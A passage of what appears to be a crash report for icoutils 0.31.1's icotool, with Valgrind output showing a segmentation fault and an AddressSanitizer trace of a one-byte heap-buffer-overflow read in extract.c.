==4859== by 0x402420: main (main.c:323)
==4859==
==4859==
==4859== Process terminating with default action of signal 11 (SIGSEGV)
==4859== Bad permissions for mapped region at address 0x5D23000
==4859== at 0x4041A4: extract_icons (extract.c:320)
==4859== by 0x402420: main (main.c:323)
==4859==
==4859== HEAP SUMMARY:
==4859== in use at exit: 1,063 bytes in 8 blocks
==4859== total heap usage: 54 allocs, 46 frees, 10,630 bytes allocated
==4859==
==4859== LEAK SUMMARY:
==4859== definitely lost: 64 bytes in 1 blocks
==4859== indirectly lost: 0 bytes in 0 blocks
==4859== possibly lost: 0 bytes in 0 blocks
==4859== still reachable: 999 bytes in 7 blocks
==4859== suppressed: 0 bytes in 0 blocks
==4859== Rerun with --leak-check=full to see details of leaked memory
==4859==
==4859== For counts of detected and suppressed errors, rerun with: -v
==4859== ERROR SUMMARY: 6269097 errors from 6 contexts (suppressed: 0 from 0)
Segmentation fault
ASAN Report (needs to compiled with -fsanitize=address):
==4814==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c00000be80
at pc 0x410a94 bp 0x7bbe58928250 sp 0x7bbe58928248
READ of size 1 at 0x60c00000be80 thread T0
#0 0x410a93 in simple_vec
/home/ico-target/icoutils-0.31.1/icotool/extract.c:425
#1 0x410a93 in extract_icons
/home/ico-target/icoutils-0.31.1/icotool/extract.c:313
#2 0x403efd in main /home/ico-target/icoutils-0.31.1/icotool/main.c:323
#3 0x797d4a25eb44 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#4 0x404e15 (/home/ico-target/icoutils-0.31.1/icotool/icotool+0x404e15)
0x60c00000be80 is located 0 bytes to the right of 128-byte region
[0x60c00000be00,0x60c00000be80)
allocated by thread T0 here:
#0 0x797d4ad7f73f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
#1 0x43c2e0 in xmalloc /home/ico-target/icoutils-0.31.1/lib/xmalloc.c:41
SUMMARY: AddressSanitizer: heap-buffer-overflow
/home/ico-target/icoutils-0.31.1/icotool/extract.c:425 simple_vec
Shadow bytes around the buggy address:
0x0c187fff9780: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff9790: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff97a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff97b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff97c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c187fff97d0:[fa]fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x0c187fff97e0: 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa
0x0c187fff97f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa
0x0c187fff9800: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff9810: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c187fff9820: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==4814==ABORTING
